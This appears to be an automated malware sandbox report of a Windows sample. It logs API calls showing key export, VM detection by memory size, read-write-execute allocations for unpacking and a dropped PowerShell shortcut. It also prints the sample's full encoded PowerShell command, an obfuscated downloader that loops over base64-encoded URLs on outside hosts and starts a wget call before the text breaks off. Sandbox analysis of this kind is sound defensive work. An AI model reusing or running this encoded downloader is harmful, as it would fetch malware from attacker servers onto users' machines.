CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e868 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0052e7a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 23, 2023, 9:37 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 135 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02790000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02732000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02821000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02822000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0279a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02733000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02734000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02792000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02735000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0279c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02736000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02793000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02794000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02795000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02796000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02797000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02798000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02799000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABIAG8AbABpAHMAdABBAGMAeQBsAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATwBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABrAEEATABnAEEAeQBBAEQAQQBBAE8AUQBBAD0ARwBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAGcAQQAxAEEAQwA0AEEATQBRAEEANQBBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBNAHcAQQA9ACIAOwAkAG4AaQBiAG8AbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMwBBAEMANABBAE4AUQBBAHkAQQBDADQAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAFIARQBLAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQAzAEEARABnAEEATABnAEEAeABBAEQASQBBAE0AdwBBAD0AUgBFAEsAbABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgBwAEEASABJAEEAWQBRAEIAcABBAEYAQQBBAGMAZwBCAGwAQQBIAEEAQQBkAFEAQgB3AEEARwBFAEEAYgBBAEEAdQBBAEcANABBAGQAUQBBAD0AIgA7ACQAWQBhAGsAbwBuAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAGsAQQBjAHcAQgB6AEEASABVAEEAWQBRAEIAawBBAEcARQBBAFkAZwBCAHMAQQBIAGsAQQBMAGcAQgBwAEEARwA0AEEAYQB3AEEAPQB5AHQAZQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAHcAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AQQBBAHcAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEANQA7ACQAYQBzAGUAYwByAGUAdABvAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAFkAUQBCAHMAQQBHAHcAQQBiAHcAQgAzAEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHMAQQBHAGsAQQBkAEEAQgBsAEEAQwA0AEEAWgBRAEIANABBAEgAQQBBAGIAdwBCAHoAQQBHAFUAQQBaAEEAQQA9ACIAOwAkAGQAbwBlAGwAaQBuAGcAQQByAGMAaABvAHYAZQByAHMAZQBlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBjAHcAQgB0AEEARwA4AEEAWQB3AEIAeQBBAEcARQBBAGQAQQBBAHUAQQBIAFkAQQBhAFEAQgBoAEEARwBvAEEAWgBRAEIAegBBAEEAPQA9ACIAOwAkAGgAaQBiAGkAcwBjAHUAcwBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAdwBBAEMANABBAE8AUQBBAHkAQQBDADQAQQBNAFEAQQA1AEEARABJAEEAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHIAQQBHAEUAQQBhAFEAQgAyAEEARwBFAEEAYgBBAEIANQBBAEcARQBBAEwAZwBCAHAAQQBHADQAQQBhAHcAQQA9AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBCAEEASABNAEEAWgBRAEIAcwBBAEcAdwBBAFkAUQBCADAAQQBHAFUAQQBSAFEAQgB0AEEASABBAEEAYQBBAEIAbABBAEcAMABBAFoAUQBCAHkAQQBHAEUAQQBiAEEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFkAdwBCAHYAQQBIAFUAQQBiAGcAQgAwAEEASABJAEEAZQBRAEEAPQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA0AEEARABNAEEATABnAEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAGMAQQBOAHcAQQA9ACIAOwAkAGQAaQBvAHMAYwBvAHIAZQBpAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAMABBAEMANABBAE0AUQBBADUAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATQB3AEEAdgBBAEUAWQBBAGMAdwBBADQAQQBGAEEAQQBlAFEAQQB2AEEARwB3AEEAUgBRAEIARgBBAEUAVQBBAFIAZwBBADQAQQBBAD0APQBiAHoAVQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBOAHcAQQA1AEEAQwA4AEEAVQBBAEIAcwBBAEUAdwBBAE4AQQBCAHQAQQBGAFUAQQBMAHcAQgBuAEEARQBFAEEATQBBAEIAVQBBAEcAOABBAFMAQQBBAD0AYgB6AFUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEAYwB3AEIANgBBAEUAZwBBAFUAdwBCAEkAQQBEAE0AQQBSAHcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQATABlAHAAcgBvAHQAaQBjAEYAaQBkAGQAbABpAGUAcwAgAGkAbgAgACQAZABpAG8AcwBjAG8AcgBlAGkAbgAgAC0AcwBwAGwAaQB0ACAAIgBiAHoAVQAiACkAIAB7ACQAQwBhAHMAcwBvAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEANQBBAEMANABBAE0AZwBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBBAEEAdQBBAEQARQBBAE8AUQBBADQAQQBBAD0APQBXAGEAegBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcARQBBAGIAZwBCAGgAQQBIAFEAQQBiAHcAQgB5AEEARwBrAEEAYwBnAEIAcABBAEgAVQBBAGIAUQBCAHoAQQBGAE0AQQBkAEEAQgB5AEEARwBFAEEAWQB3AEIAagBBAEcAZwBBAGEAUQBCAHUAQQBHADgAQQBMAGcAQgAyAEEARwBrAEEAYgBBAEIAcwBBAEcARQBBAGMAdwBBAD0AVwBhAHoAUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQAwAEEARABnAEEAIgA7ACQAUABlAGMAaABlAGQATABhAGQAeQBoAG8AbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAFkAdwBCAHAAQQBIAEEAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAdQBBAEgAQQBBAGEAUQBCAGoAQQBIAFEAQQBkAFEAQgB5AEEARwBVAEEAYwB3AEEAPQBDAHIARgBsAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEcAawBBAFkAUQBCAHQAQQBHAEkAQQBaAFEAQgAxAEEASABnAEEATABnAEIAcQBBAEgAQQBBACIAOwAkAHUAbgBzAGUAZQBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBFAEEAYwBnAEIAbABBAEcARQBBAGIAQQBCAHMAQQBGAFUAQQBiAGcAQgB3AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAFoAQQBBAHUAQQBHAFEAQQBaAFEAQgB1AEEASABRAEEAWQBRAEIAcwBBAEEAPQA9AGUAQQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEANQBBAEMANABBAE0AZwBBADEAQQBEAFEAQQBMAGcAQQA0AEEARABRAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAD0AZQBBAD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBjAFEAQgAxAEEARwBFAEEAYwBnAEIAcABBAEgATQBBAGQAQQBCAHoAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQAiADsAdAByAHkAIAB7ACQAQQBuAGkAcwBpAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBaAFEAQgB0AEEARwBrAEEAYwBBAEIAeQBBAEcAOABBAGIAZwBCAGwAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAbwBBAEcAOABBAGIAZwBCAHYAQQBIAE0AQQBMAGcAQgB1AEEASABrAEEAWQB3AEEAPQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAZwBBAEwAZwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAdwBBAEMANABBAE0AUQBBADMAQQBEAFkAQQAiADsAJABSAGUAdAByAG8AbQBpAGcAcgBhAHQAaQBvAG4AUwBhAGwAdABpAHIAZQB3AGkAcwBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAdgBBAEcASQBBAGIAQQBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEAWgBBAEIATgBBAEcAOABBAGMAZwBCADAAQQBHAEUAQQBiAEEAQgB6AEEAQwA0AEEAYwB3AEIAbwBBAEcAOABBAGQAdwBBAD0AIgA7ACQARQBsAGUAYwB0AHIAbwBsAHkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBADQAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQA0AEEAQQA9AD0AIgA7ACQAbgBvAG4AbQBpAGwAaQB0AGEAbgB0AGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABMAGUAcAByAG8AdABpAGMARgBpAGQAZABsAGkAZQBzACkAKQA7AHcAZwBlAH